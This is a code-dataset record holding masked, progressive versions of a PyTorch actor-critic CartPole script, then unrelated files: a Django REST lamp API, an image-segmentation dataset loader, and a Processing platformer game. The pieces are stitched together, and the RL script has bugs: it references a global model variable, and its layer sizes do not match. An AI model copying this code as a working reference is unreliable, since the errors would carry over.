"step-1": "<mask token>\n\n\nclass Agent(object):\n\n def __init__(self, model=None, lr=0.01, gamma=0.99):\n self.gamma = gamma\n self.AC = model\n self.optimizer = Adam(AC.parameters(), lr=lr)\n self.logp_as = []\n self.values = []\n self.rewards = []\n\n def choose_action(self, obs):\n action_logits, value = self.AC(obs)\n distribution = Categorical(action_logits)\n action = distribution.sample()\n self.logp_as.append(distribution.log_prob(action))\n self.values.append(value)\n return action.item()\n\n def learn(self):\n R = 0\n policy_losses = []\n value_losses = []\n returns = []\n for r in self.rewards[::-1]:\n R = r + self.gamma * R\n returns.insert(0, R)\n returns = torch.tensor(returns).to(Device)\n returns = (returns - returns.mean()) / (returns.std() + 1e-05)\n for logp_a, value, R in zip(self.logp_as, self.values, returns):\n advantage = R - value.item()\n policy_losses.append(-logp_a * advantage)\n value_losses.append(F.smooth_l1_loss(value, torch.tensor([R]).\n to(Device)))\n self.optimizer.zero_grad()\n loss = torch.stack(policy_losses).sum() + torch.stack(value_losses\n ).sum()\n loss.backward(retain_graph=True)\n self.optimizer.step()\n self.rewards = []\n self.values = []\n self.logp_as = []\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass ActorCriticNet(nn.Module):\n\n def __init__(self, observation_space, action_space, hidden_sizes=[32, \n 32], activation=nn.Tanh):\n super().__init__()\n obs_dim = observation_space.shape[0]\n action_dim = action_space.n\n self.base_net = nn.Sequential(nn.Linear(obs_dim, hidden_sizes[0]))\n self.pi = nn.Linear(hidden_sizes[1], action_dim)\n self.vf = nn.Linear(hidden_sizes[1], 1)\n self.to(Device)\n\n def forward(self, obs):\n obs = torch.Tensor(obs).to(Device)\n x = F.relu(self.base_net(obs))\n action_logits = F.softmax(self.pi(x), dim=-1)\n value = self.vf(x)\n return action_logits, value\n\n\nclass Agent(object):\n\n def __init__(self, model=None, lr=0.01, gamma=0.99):\n self.gamma = gamma\n self.AC = model\n self.optimizer = Adam(AC.parameters(), lr=lr)\n self.logp_as = []\n self.values = []\n self.rewards = []\n\n def choose_action(self, obs):\n action_logits, value = self.AC(obs)\n distribution = Categorical(action_logits)\n action = distribution.sample()\n self.logp_as.append(distribution.log_prob(action))\n self.values.append(value)\n return action.item()\n\n def learn(self):\n R = 0\n policy_losses = []\n value_losses = []\n returns = []\n for r in self.rewards[::-1]:\n R = r + self.gamma * R\n returns.insert(0, R)\n returns = torch.tensor(returns).to(Device)\n returns = (returns - returns.mean()) / (returns.std() + 1e-05)\n for logp_a, value, R in zip(self.logp_as, self.values, returns):\n advantage = R - value.item()\n policy_losses.append(-logp_a * advantage)\n value_losses.append(F.smooth_l1_loss(value, torch.tensor([R]).\n to(Device)))\n self.optimizer.zero_grad()\n loss = torch.stack(policy_losses).sum() + torch.stack(value_losses\n ).sum()\n loss.backward(retain_graph=True)\n self.optimizer.step()\n self.rewards = []\n self.values = []\n self.logp_as = []\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass ActorCriticNet(nn.Module):\n\n def __init__(self, observation_space, action_space, hidden_sizes=[32, \n 32], activation=nn.Tanh):\n super().__init__()\n obs_dim = observation_space.shape[0]\n action_dim = action_space.n\n self.base_net = nn.Sequential(nn.Linear(obs_dim, hidden_sizes[0]))\n self.pi = nn.Linear(hidden_sizes[1], action_dim)\n self.vf = nn.Linear(hidden_sizes[1], 1)\n self.to(Device)\n\n def forward(self, obs):\n obs = torch.Tensor(obs).to(Device)\n x = F.relu(self.base_net(obs))\n action_logits = F.softmax(self.pi(x), dim=-1)\n value = self.vf(x)\n return action_logits, value\n\n\nclass Agent(object):\n\n def __init__(self, model=None, lr=0.01, gamma=0.99):\n self.gamma = gamma\n self.AC = model\n self.optimizer = Adam(AC.parameters(), lr=lr)\n self.logp_as = []\n self.values = []\n self.rewards = []\n\n def choose_action(self, obs):\n action_logits, value = self.AC(obs)\n distribution = Categorical(action_logits)\n action = distribution.sample()\n self.logp_as.append(distribution.log_prob(action))\n self.values.append(value)\n return action.item()\n\n def learn(self):\n R = 0\n policy_losses = []\n value_losses = []\n returns = []\n for r in self.rewards[::-1]:\n R = r + self.gamma * R\n returns.insert(0, R)\n returns = torch.tensor(returns).to(Device)\n returns = (returns - returns.mean()) / (returns.std() + 1e-05)\n for logp_a, value, R in zip(self.logp_as, self.values, returns):\n advantage = R - value.item()\n policy_losses.append(-logp_a * advantage)\n value_losses.append(F.smooth_l1_loss(value, torch.tensor([R]).\n to(Device)))\n self.optimizer.zero_grad()\n loss = torch.stack(policy_losses).sum() + torch.stack(value_losses\n ).sum()\n loss.backward(retain_graph=True)\n self.optimizer.step()\n self.rewards = []\n self.values = []\n self.logp_as = []\n\n\n<mask token>\nfor episode in range(EPISODES):\n done = False\n obs = env.reset()\n I = 1\n T = 0\n episode_reward = 0\n running_reward = 0\n if episode % show_every == 0:\n is_render = True\n else:\n is_render = False\n while not done:\n if is_render:\n env.render('human')\n action = agent.choose_action(obs)\n next_obs, reward, done, _ = env.step(action)\n obs = next_obs\n agent.rewards.append(reward)\n T += 1\n episode_reward += reward\n agent.learn()\n running_reward = 0.05 * episode_reward + (1 - 0.05) * running_reward\n print(f'episode_{episode} \\t ep_reward = {episode_reward} \\t ep_len = {T}')\n if running_reward > env.spec.reward_threshold:\n print(\n 'Solved! Running reward is now {} and the last episode runs to {} time steps!'\n .format(running_reward, T))\n break\n",
"step-4": "import torch.nn as nn\nimport torch\nfrom torch.distributions.categorical import Categorical\nimport torch.nn.functional as F\nfrom torch.optim import Adam\nimport gym\nimport numpy as np\nDevice = torch.device('cuda:0')\n\n\nclass ActorCriticNet(nn.Module):\n\n def __init__(self, observation_space, action_space, hidden_sizes=[32, \n 32], activation=nn.Tanh):\n super().__init__()\n obs_dim = observation_space.shape[0]\n action_dim = action_space.n\n self.base_net = nn.Sequential(nn.Linear(obs_dim, hidden_sizes[0]))\n self.pi = nn.Linear(hidden_sizes[1], action_dim)\n self.vf = nn.Linear(hidden_sizes[1], 1)\n self.to(Device)\n\n def forward(self, obs):\n obs = torch.Tensor(obs).to(Device)\n x = F.relu(self.base_net(obs))\n action_logits = F.softmax(self.pi(x), dim=-1)\n value = self.vf(x)\n return action_logits, value\n\n\nclass Agent(object):\n\n def __init__(self, model=None, lr=0.01, gamma=0.99):\n self.gamma = gamma\n self.AC = model\n self.optimizer = Adam(AC.parameters(), lr=lr)\n self.logp_as = []\n self.values = []\n self.rewards = []\n\n def choose_action(self, obs):\n action_logits, value = self.AC(obs)\n distribution = Categorical(action_logits)\n action = distribution.sample()\n self.logp_as.append(distribution.log_prob(action))\n self.values.append(value)\n return action.item()\n\n def learn(self):\n R = 0\n policy_losses = []\n value_losses = []\n returns = []\n for r in self.rewards[::-1]:\n R = r + self.gamma * R\n returns.insert(0, R)\n returns = torch.tensor(returns).to(Device)\n returns = (returns - returns.mean()) / (returns.std() + 1e-05)\n for logp_a, value, R in zip(self.logp_as, self.values, returns):\n advantage = R - value.item()\n policy_losses.append(-logp_a * advantage)\n value_losses.append(F.smooth_l1_loss(value, torch.tensor([R]).\n to(Device)))\n self.optimizer.zero_grad()\n loss = torch.stack(policy_losses).sum() + torch.stack(value_losses\n ).sum()\n loss.backward(retain_graph=True)\n self.optimizer.step()\n self.rewards = []\n self.values = []\n self.logp_as = []\n\n\nenv = gym.make('CartPole-v1')\nstate = env.reset()\nlr = 0.03\nEPISODES = 30000\nGAMMA = 0.99\nhidden_sizes = [128, 128]\nshow_every = 100\nAC = ActorCriticNet(env.observation_space, env.action_space, hidden_sizes)\nagent = Agent(AC, lr=lr, gamma=GAMMA)\nfor episode in range(EPISODES):\n done = False\n obs = env.reset()\n I = 1\n T = 0\n episode_reward = 0\n running_reward = 0\n if episode % show_every == 0:\n is_render = True\n else:\n is_render = False\n while not done:\n if is_render:\n env.render('human')\n action = agent.choose_action(obs)\n next_obs, reward, done, _ = env.step(action)\n obs = next_obs\n agent.rewards.append(reward)\n T += 1\n episode_reward += reward\n agent.learn()\n running_reward = 0.05 * episode_reward + (1 - 0.05) * running_reward\n print(f'episode_{episode} \\t ep_reward = {episode_reward} \\t ep_len = {T}')\n if running_reward > env.spec.reward_threshold:\n print(\n 'Solved! Running reward is now {} and the last episode runs to {} time steps!'\n .format(running_reward, T))\n break\n",
"step-5": "import torch.nn as nn\nimport torch\nfrom torch.distributions.categorical import Categorical\nimport torch.nn.functional as F\nfrom torch.optim import Adam\n\nimport gym\nimport numpy as np\n\nDevice = torch.device(\"cuda:0\")\n\nclass ActorCriticNet(nn.Module):\n def __init__(self, observation_space, action_space,\n hidden_sizes=[32,32], activation=nn.Tanh):\n super().__init__()\n\n obs_dim = observation_space.shape[0]\n action_dim = action_space.n\n self.base_net = nn.Sequential(\n nn.Linear(obs_dim, hidden_sizes[0]),\n # nn.Linear(hidden_sizes[0], hidden_sizes[1]),\n )\n self.pi = nn.Linear(hidden_sizes[1], action_dim)\n self.vf = nn.Linear(hidden_sizes[1],1)\n self.to(Device)\n \n def forward(self, obs):\n obs = torch.Tensor(obs).to(Device)\n x = F.relu(self.base_net(obs))\n action_logits = F.softmax(self.pi(x), dim=-1)\n value = self.vf(x)\n return action_logits, value\n\nclass Agent(object):\n def __init__(self, model=None, lr=1e-2, gamma=0.99):\n self.gamma = gamma\n self.AC = model\n self.optimizer = Adam(AC.parameters(), lr=lr)\n self.logp_as = []\n self.values = []\n self.rewards = []\n\n def choose_action(self, obs):\n action_logits, value = self.AC(obs)\n distribution = Categorical(action_logits)\n action = distribution.sample()\n self.logp_as.append(distribution.log_prob(action))\n self.values.append(value)\n return action.item()\n \n def learn(self):\n\n R = 0\n policy_losses = []\n value_losses = []\n returns = []\n\n for r in self.rewards[::-1]:\n R = r + self.gamma * R\n returns.insert(0, R)\n returns = torch.tensor(returns).to(Device)\n returns = (returns - returns.mean()) / (returns.std() + 0.00001)\n\n for logp_a, value, R in zip(self.logp_as, self.values, returns):\n advantage = R - value.item()\n # calculate actor (policy) loss \n policy_losses.append(-logp_a * advantage)\n # calculate critic (value) loss using L1 smooth loss\n value_losses.append(F.smooth_l1_loss(value, torch.tensor([R]).to(Device)))\n\n self.optimizer.zero_grad()\n loss = torch.stack(policy_losses).sum() + torch.stack(value_losses).sum()\n loss.backward(retain_graph=True)\n self.optimizer.step()\n\n self.rewards = []\n self.values = []\n self.logp_as = []\n \n\n# Build env\nenv = gym.make('CartPole-v1')\nstate = env.reset()\n\n# Learning setting\nlr = 3e-2\nEPISODES=30000\nGAMMA = 0.99\nhidden_sizes = [128,128]\nshow_every = 100\n\nAC = ActorCriticNet(env.observation_space, env.action_space, hidden_sizes)\nagent = Agent(AC, lr=lr, gamma=GAMMA)\n\nfor episode in range(EPISODES):\n # For every episode init\n done = False\n obs = env.reset()\n I = 1\n T = 0\n\n # Logs\n episode_reward = 0\n running_reward = 0\n if episode % show_every == 0:\n is_render = True\n else:\n is_render = False\n\n while not done:\n # Render\n if is_render:\n env.render(\"human\")\n \n # Predict action and value\n action = agent.choose_action(obs)\n\n # Step the env\n next_obs, reward, done, _ = env.step(action)\n\n # Update obs\n obs = next_obs\n agent.rewards.append(reward)\n T += 1\n\n # Logs\n episode_reward += reward\n \n # Learn once\n agent.learn()\n\n # Update cumulative reward\n running_reward = 0.05 * episode_reward + (1 - 0.05) * running_reward\n \n print(f\"episode_{episode} \\t ep_reward = {episode_reward} \\t ep_len = {T}\")\n if running_reward > env.spec.reward_threshold:\n print(\"Solved! Running reward is now {} and \"\n \"the last episode runs to {} time steps!\".format(running_reward, T))\n break\n",
"step-ids": [
4,
7,
8,
10,
11
]
}
|
[
4,
7,
8,
10,
11
] |
from rest_framework import serializers, viewsets, routers
from lamp_control.models import Lamp
class LampSerializer(serializers.HyperlinkedModelSerializer):
class Meta:
model = Lamp
fields = '__all__'
class LampViewSet(viewsets.ModelViewSet):
serializer_class = LampSerializer
queryset = Lamp.objects.all()
router = routers.DefaultRouter()
router.register(r'lamps', LampViewSet)
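
A hedged sketch of wiring the router above into a project's URLconf; the 'api/' prefix and the assumption that the module above is lamp_control/views.py are illustrative, not taken from the record:

from django.urls import include, path
from lamp_control.views import router  # assumed location of the module above

urlpatterns = [
    path('api/', include(router.urls)),
]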
|
flexible
|
{
"blob_id": "aff1d702e591efcfc0fc93150a3fbec532408137",
"index": 55,
"step-1": "<mask token>\n\n\nclass LampViewSet(viewsets.ModelViewSet):\n serializer_class = LampSerializer\n queryset = Lamp.objects.all()\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass LampSerializer(serializers.HyperlinkedModelSerializer):\n\n\n class Meta:\n model = Lamp\n fields = '__all__'\n\n\nclass LampViewSet(viewsets.ModelViewSet):\n serializer_class = LampSerializer\n queryset = Lamp.objects.all()\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass LampSerializer(serializers.HyperlinkedModelSerializer):\n\n\n class Meta:\n model = Lamp\n fields = '__all__'\n\n\nclass LampViewSet(viewsets.ModelViewSet):\n serializer_class = LampSerializer\n queryset = Lamp.objects.all()\n\n\nrouter = routers.DefaultRouter()\nrouter.register('lamps', LampViewSet)\n",
"step-4": "from rest_framework import serializers, viewsets, routers\nfrom lamp_control.models import Lamp\n\n\nclass LampSerializer(serializers.HyperlinkedModelSerializer):\n\n\n class Meta:\n model = Lamp\n fields = '__all__'\n\n\nclass LampViewSet(viewsets.ModelViewSet):\n serializer_class = LampSerializer\n queryset = Lamp.objects.all()\n\n\nrouter = routers.DefaultRouter()\nrouter.register('lamps', LampViewSet)\n",
"step-5": "from rest_framework import serializers, viewsets, routers\n\nfrom lamp_control.models import Lamp\n\n\nclass LampSerializer(serializers.HyperlinkedModelSerializer):\n class Meta:\n model = Lamp\n fields = '__all__'\n\n\nclass LampViewSet(viewsets.ModelViewSet):\n serializer_class = LampSerializer\n queryset = Lamp.objects.all()\n\n\nrouter = routers.DefaultRouter()\nrouter.register(r'lamps', LampViewSet)\n",
"step-ids": [
2,
3,
5,
6,
7
]
}
|
[
2,
3,
5,
6,
7
] |
import os
import cv2
import numpy as np
import torch
import torch.utils.data
import torchvision
from torchvision import transforms
from utils.utils import loadYaml
from .base_datalayer import BaseDataLayer
import albumentations as albu
class Datalayer(BaseDataLayer):
def __init__(self, config, augmentation=None, preprocessing=None):
super(Datalayer, self).__init__()
self.config = config
train_dir = self.config['Dataset']['TrainPath']
bg_imgs_dir = os.path.join(train_dir, 'bg')
mask_suffix = '_mask.png'
img_suffix = '.png'
self.bg_masks_path = [os.path.join(bg_imgs_dir, bg_mask_name) for bg_mask_name in os.listdir(bg_imgs_dir) if
bg_mask_name.endswith(mask_suffix)]
self.bg_imgs_path = [bg_mask_path.replace(mask_suffix, img_suffix) for bg_mask_path in self.bg_masks_path]
ng_imgs_dir = os.path.join(train_dir, 'ng')
self.ng_masks_path = [os.path.join(ng_imgs_dir, ng_img_name) for ng_img_name in os.listdir(ng_imgs_dir) if
ng_img_name.endswith(mask_suffix)]
self.ng_imgs_path = [ng_mask_path.replace(mask_suffix, img_suffix) for ng_mask_path in self.ng_masks_path]
self.augmentation = augmentation
self.preprocessing = preprocessing
def __len__(self):
return len(self.bg_masks_path) + len(self.ng_masks_path)
def __getitem__(self, item):
# bg
if np.random.random() > 0.5 and len(self.bg_masks_path) > 0:
random_id_bg = np.random.randint(0, len(self.bg_imgs_path))
img_path, mask_path = self.bg_imgs_path[random_id_bg], self.bg_masks_path[random_id_bg]
# ng
else:
random_id_ng = np.random.randint(0, len(self.ng_imgs_path))
img_path, mask_path = self.ng_imgs_path[random_id_ng], self.ng_masks_path[random_id_ng]
img = cv2.imread(img_path)
mask = cv2.imread(mask_path)
img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
# apply augmentations
if self.augmentation:
sample = self.augmentation(image=img, mask=mask)
img, mask = sample['image'], sample['mask']
# apply preprocessing
if self.preprocessing:
sample = self.preprocessing(image=img, mask=mask)
img, mask = sample['image'], sample['mask']
return img, mask
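
A hedged usage sketch for the dataset above. The config shape mirrors what __init__ reads, but the path is a placeholder, and relying on the default collate to stack the raw numpy arrays into tensors is an assumption:

from torch.utils.data import DataLoader

config = {'Dataset': {'TrainPath': '/data/train'}}  # placeholder path
dataset = Datalayer(config)
loader = DataLoader(dataset, batch_size=8, shuffle=True)
imgs, masks = next(iter(loader))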
|
flexible
|
{
"blob_id": "9928eaa32468453f405d8bb650f3e0e85a7933bf",
"index": 5514,
"step-1": "<mask token>\n\n\nclass Datalayer(BaseDataLayer):\n <mask token>\n <mask token>\n\n def __getitem__(self, item):\n if np.random.random() > 0.5 and len(self.bg_masks_path) > 0:\n random_id_bg = np.random.randint(0, len(self.bg_imgs_path))\n img_path, mask_path = self.bg_imgs_path[random_id_bg\n ], self.bg_masks_path[random_id_bg]\n else:\n random_id_ng = np.random.randint(0, len(self.ng_imgs_path))\n img_path, mask_path = self.ng_imgs_path[random_id_ng\n ], self.ng_masks_path[random_id_ng]\n img = cv2.imread(img_path)\n mask = cv2.imread(mask_path)\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n if self.augmentation:\n sample = self.augmentation(image=img, mask=mask)\n img, mask = sample['image'], sample['mask']\n if self.preprocessing:\n sample = self.preprocessing(image=img, mask=mask)\n img, mask = sample['image'], sample['mask']\n return img, mask\n",
"step-2": "<mask token>\n\n\nclass Datalayer(BaseDataLayer):\n <mask token>\n\n def __len__(self):\n return len(self.bg_masks_path) + len(self.ng_masks_path)\n\n def __getitem__(self, item):\n if np.random.random() > 0.5 and len(self.bg_masks_path) > 0:\n random_id_bg = np.random.randint(0, len(self.bg_imgs_path))\n img_path, mask_path = self.bg_imgs_path[random_id_bg\n ], self.bg_masks_path[random_id_bg]\n else:\n random_id_ng = np.random.randint(0, len(self.ng_imgs_path))\n img_path, mask_path = self.ng_imgs_path[random_id_ng\n ], self.ng_masks_path[random_id_ng]\n img = cv2.imread(img_path)\n mask = cv2.imread(mask_path)\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n if self.augmentation:\n sample = self.augmentation(image=img, mask=mask)\n img, mask = sample['image'], sample['mask']\n if self.preprocessing:\n sample = self.preprocessing(image=img, mask=mask)\n img, mask = sample['image'], sample['mask']\n return img, mask\n",
"step-3": "<mask token>\n\n\nclass Datalayer(BaseDataLayer):\n\n def __init__(self, config, augmentation=None, preprocessing=None):\n super(Datalayer, self).__init__()\n self.config = config\n train_dir = self.config['Dataset']['TrainPath']\n bg_imgs_dir = os.path.join(train_dir, 'bg')\n mask_suffix = '_mask.png'\n img_suffix = '.png'\n self.bg_masks_path = [os.path.join(bg_imgs_dir, bg_mask_name) for\n bg_mask_name in os.listdir(bg_imgs_dir) if bg_mask_name.\n endswith(mask_suffix)]\n self.bg_imgs_path = [bg_mask_path.replace(mask_suffix, img_suffix) for\n bg_mask_path in self.bg_masks_path]\n ng_imgs_dir = os.path.join(train_dir, 'ng')\n self.ng_masks_path = [os.path.join(ng_imgs_dir, ng_img_name) for\n ng_img_name in os.listdir(ng_imgs_dir) if ng_img_name.endswith(\n mask_suffix)]\n self.ng_imgs_path = [ng_mask_path.replace(mask_suffix, img_suffix) for\n ng_mask_path in self.ng_masks_path]\n self.augmentation = augmentation\n self.preprocessing = preprocessing\n\n def __len__(self):\n return len(self.bg_masks_path) + len(self.ng_masks_path)\n\n def __getitem__(self, item):\n if np.random.random() > 0.5 and len(self.bg_masks_path) > 0:\n random_id_bg = np.random.randint(0, len(self.bg_imgs_path))\n img_path, mask_path = self.bg_imgs_path[random_id_bg\n ], self.bg_masks_path[random_id_bg]\n else:\n random_id_ng = np.random.randint(0, len(self.ng_imgs_path))\n img_path, mask_path = self.ng_imgs_path[random_id_ng\n ], self.ng_masks_path[random_id_ng]\n img = cv2.imread(img_path)\n mask = cv2.imread(mask_path)\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n if self.augmentation:\n sample = self.augmentation(image=img, mask=mask)\n img, mask = sample['image'], sample['mask']\n if self.preprocessing:\n sample = self.preprocessing(image=img, mask=mask)\n img, mask = sample['image'], sample['mask']\n return img, mask\n",
"step-4": "import os\nimport cv2\nimport numpy as np\nimport torch\nimport torch.utils.data\nimport torchvision\nfrom torchvision import transforms\nfrom utils.utils import loadYaml\nfrom .base_datalayer import BaseDataLayer\nimport albumentations as albu\n\n\nclass Datalayer(BaseDataLayer):\n\n def __init__(self, config, augmentation=None, preprocessing=None):\n super(Datalayer, self).__init__()\n self.config = config\n train_dir = self.config['Dataset']['TrainPath']\n bg_imgs_dir = os.path.join(train_dir, 'bg')\n mask_suffix = '_mask.png'\n img_suffix = '.png'\n self.bg_masks_path = [os.path.join(bg_imgs_dir, bg_mask_name) for\n bg_mask_name in os.listdir(bg_imgs_dir) if bg_mask_name.\n endswith(mask_suffix)]\n self.bg_imgs_path = [bg_mask_path.replace(mask_suffix, img_suffix) for\n bg_mask_path in self.bg_masks_path]\n ng_imgs_dir = os.path.join(train_dir, 'ng')\n self.ng_masks_path = [os.path.join(ng_imgs_dir, ng_img_name) for\n ng_img_name in os.listdir(ng_imgs_dir) if ng_img_name.endswith(\n mask_suffix)]\n self.ng_imgs_path = [ng_mask_path.replace(mask_suffix, img_suffix) for\n ng_mask_path in self.ng_masks_path]\n self.augmentation = augmentation\n self.preprocessing = preprocessing\n\n def __len__(self):\n return len(self.bg_masks_path) + len(self.ng_masks_path)\n\n def __getitem__(self, item):\n if np.random.random() > 0.5 and len(self.bg_masks_path) > 0:\n random_id_bg = np.random.randint(0, len(self.bg_imgs_path))\n img_path, mask_path = self.bg_imgs_path[random_id_bg\n ], self.bg_masks_path[random_id_bg]\n else:\n random_id_ng = np.random.randint(0, len(self.ng_imgs_path))\n img_path, mask_path = self.ng_imgs_path[random_id_ng\n ], self.ng_masks_path[random_id_ng]\n img = cv2.imread(img_path)\n mask = cv2.imread(mask_path)\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n if self.augmentation:\n sample = self.augmentation(image=img, mask=mask)\n img, mask = sample['image'], sample['mask']\n if self.preprocessing:\n sample = self.preprocessing(image=img, mask=mask)\n img, mask = sample['image'], sample['mask']\n return img, mask\n",
"step-5": "import os\nimport cv2\nimport numpy as np\nimport torch\nimport torch.utils.data\nimport torchvision\nfrom torchvision import transforms\nfrom utils.utils import loadYaml\nfrom .base_datalayer import BaseDataLayer\nimport albumentations as albu\n\n\nclass Datalayer(BaseDataLayer):\n\n def __init__(self, config, augmentation=None, preprocessing=None):\n super(Datalayer, self).__init__()\n self.config = config\n train_dir = self.config['Dataset']['TrainPath']\n\n bg_imgs_dir = os.path.join(train_dir, 'bg')\n\n mask_suffix = '_mask.png'\n img_suffix = '.png'\n self.bg_masks_path = [os.path.join(bg_imgs_dir, bg_mask_name) for bg_mask_name in os.listdir(bg_imgs_dir) if\n bg_mask_name.endswith(mask_suffix)]\n self.bg_imgs_path = [bg_mask_path.replace(mask_suffix, img_suffix) for bg_mask_path in self.bg_masks_path]\n\n ng_imgs_dir = os.path.join(train_dir, 'ng')\n self.ng_masks_path = [os.path.join(ng_imgs_dir, ng_img_name) for ng_img_name in os.listdir(ng_imgs_dir) if\n ng_img_name.endswith(mask_suffix)]\n self.ng_imgs_path = [ng_mask_path.replace(mask_suffix, img_suffix) for ng_mask_path in self.ng_masks_path]\n\n self.augmentation = augmentation\n self.preprocessing = preprocessing\n\n def __len__(self):\n return len(self.bg_masks_path) + len(self.ng_masks_path)\n\n def __getitem__(self, item):\n # bg\n if np.random.random() > 0.5 and len(self.bg_masks_path) > 0:\n random_id_bg = np.random.randint(0, len(self.bg_imgs_path))\n img_path, mask_path = self.bg_imgs_path[random_id_bg], self.bg_masks_path[random_id_bg]\n # ng\n else:\n random_id_ng = np.random.randint(0, len(self.ng_imgs_path))\n img_path, mask_path = self.ng_imgs_path[random_id_ng], self.ng_masks_path[random_id_ng]\n\n img = cv2.imread(img_path)\n mask = cv2.imread(mask_path)\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n\n # apply augmentations\n if self.augmentation:\n sample = self.augmentation(image=img, mask=mask)\n img, mask = sample['image'], sample['mask']\n # apply preprocessing\n if self.preprocessing:\n sample = self.preprocessing(image=img, mask=mask)\n img, mask = sample['image'], sample['mask']\n return img, mask\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
from platform_class import *
from player_class import *
from functions import *
delay = 3000
startOfGame = False
# def keyPressed():
# startOfGame = True
# print(startOfGame)
# if (keyCode == 'B'):
# print("I am pressed")
# startOfGame = True
def mousePressed():
global platforms
platforms = []
starter_platform = platform([100, 700])
platforms.append(starter_platform)
global p1
p1 = player()
loop()
def setup():
#global setup options
size(500, 800)
rectMode(CENTER)
# sb = loadImage("assets\\gameover.jpg")
# sb.resize(width, height)
# background(sb)
global atStartUp
atStartUp = True
global startTimeMs
startTimeMs = millis()
global bg, go, sb
bg = loadImage("assets\\background.png")
bg.resize(width, height)
go = loadImage("assets\\gameover.jpg")
go.resize(width, height)
sb = loadImage("assets\\start.png")
sb.resize(width, height)
global startOfGame
startOfGame = False
#list of platforms
global platforms
platforms = []
starter_platform = platform([100, 700])
platforms.append(starter_platform)
global p1
p1 = player()
def draw():
global atStartUp
if (atStartUp):
currentTimeMs = millis()
startUpTimeRemaining = delay - (currentTimeMs - startTimeMs)
startScreen(startUpTimeRemaining)
atStartUp = startUpTimeRemaining > 0
return
frameRate(30)
background(bg)
for platform in platforms:
# print (len(platforms))
platform.display()
p1.update(platforms)
platform_manager(platforms)
#this ends the game if the player falls off the screen
if p1.ypos > height+25:
background(go)
fill(255, 255, 255)
textAlign(CENTER, CENTER)
textSize(80)
text("GAME", width/2, 2*height/10)
text("OVER", width/2, 3*height/10)
textSize(30)
fill(240,225,48)
text("Score: "+str(p1.score/100), width/2, 0.5*height/10)
textSize(20)
fill(255, 255, 255)
text("Click anywhere on the screen to RETRY", width/2, 8*height/10)
text("Press ESC to exit", width/2, 8.5*height/10)
textSize(10)
fill(240,225,48)
text("Made by Priyam Sahoo", width/2, 9.5*height/10)
textAlign(LEFT)
noLoop()
def startScreen(remainingTime):
background(sb)
fill(0)
textAlign(CENTER, CENTER)
textSize(40)
fill(240,225,48)
text("Welcome to Fallin't", width/2, 0.25*height/2)
textSize(100)
fill(50, 50, 50)
text(ceil(remainingTime / 1000.0), width/2, 1.65*height/2)
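
A hedged completion of the commented-out keyPressed() stub above, assuming the intent was for 'B' to skip the start-screen countdown; Processing supplies the global key:

def keyPressed():
    global atStartUp
    if str(key).upper() == 'B':
        atStartUp = False  # skip the remaining countdown and start the game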
|
normal
|
{
"blob_id": "850251338e8af841a5214b37610d1b6fba572aa5",
"index": 1138,
"step-1": "<mask token>\n\n\ndef setup():\n size(500, 800)\n rectMode(CENTER)\n global atStartUp\n atStartUp = True\n global startTimeMs\n startTimeMs = millis()\n global bg, go, sb\n bg = loadImage('assets\\\\background.png')\n bg.resize(width, height)\n go = loadImage('assets\\\\gameover.jpg')\n go.resize(width, height)\n sb = loadImage('assets\\\\start.png')\n sb.resize(width, height)\n global startOfGame\n startOfGame = False\n global platforms\n platforms = []\n starter_platform = platform([100, 700])\n platforms.append(starter_platform)\n global p1\n p1 = player()\n\n\ndef draw():\n global atStartUp\n if atStartUp:\n currentTimeMs = millis()\n startUpTimeRemaining = delay - (currentTimeMs - startTimeMs)\n startScreen(startUpTimeRemaining)\n atStartUp = startUpTimeRemaining > 0\n return\n frameRate(30)\n background(bg)\n for platform in platforms:\n platform.display()\n p1.update(platforms)\n platform_manager(platforms)\n if p1.ypos > height + 25:\n background(go)\n fill(255, 255, 255)\n textAlign(CENTER, CENTER)\n textSize(80)\n text('GAME', width / 2, 2 * height / 10)\n text('OVER', width / 2, 3 * height / 10)\n textSize(30)\n fill(240, 225, 48)\n text('Score: ' + str(p1.score / 100), width / 2, 0.5 * height / 10)\n textSize(20)\n fill(255, 255, 255)\n text('Click anywhere on the screen to RETRY', width / 2, 8 * height /\n 10)\n text('Press ESC to exit', width / 2, 8.5 * height / 10)\n textSize(10)\n fill(240, 225, 48)\n text('Made by Priyam Sahoo', width / 2, 9.5 * height / 10)\n textAlign(LEFT)\n noLoop()\n\n\ndef startScreen(remainingTime):\n background(sb)\n fill(0)\n textAlign(CENTER, CENTER)\n textSize(40)\n fill(240, 225, 48)\n text(\"Welcome to Fallin't\", width / 2, 0.25 * height / 2)\n textSize(100)\n fill(50, 50, 50)\n text(ceil(remainingTime / 1000.0), width / 2, 1.65 * height / 2)\n",
"step-2": "<mask token>\n\n\ndef mousePressed():\n global platforms\n platforms = []\n starter_platform = platform([100, 700])\n platforms.append(starter_platform)\n global p1\n p1 = player()\n loop()\n\n\ndef setup():\n size(500, 800)\n rectMode(CENTER)\n global atStartUp\n atStartUp = True\n global startTimeMs\n startTimeMs = millis()\n global bg, go, sb\n bg = loadImage('assets\\\\background.png')\n bg.resize(width, height)\n go = loadImage('assets\\\\gameover.jpg')\n go.resize(width, height)\n sb = loadImage('assets\\\\start.png')\n sb.resize(width, height)\n global startOfGame\n startOfGame = False\n global platforms\n platforms = []\n starter_platform = platform([100, 700])\n platforms.append(starter_platform)\n global p1\n p1 = player()\n\n\ndef draw():\n global atStartUp\n if atStartUp:\n currentTimeMs = millis()\n startUpTimeRemaining = delay - (currentTimeMs - startTimeMs)\n startScreen(startUpTimeRemaining)\n atStartUp = startUpTimeRemaining > 0\n return\n frameRate(30)\n background(bg)\n for platform in platforms:\n platform.display()\n p1.update(platforms)\n platform_manager(platforms)\n if p1.ypos > height + 25:\n background(go)\n fill(255, 255, 255)\n textAlign(CENTER, CENTER)\n textSize(80)\n text('GAME', width / 2, 2 * height / 10)\n text('OVER', width / 2, 3 * height / 10)\n textSize(30)\n fill(240, 225, 48)\n text('Score: ' + str(p1.score / 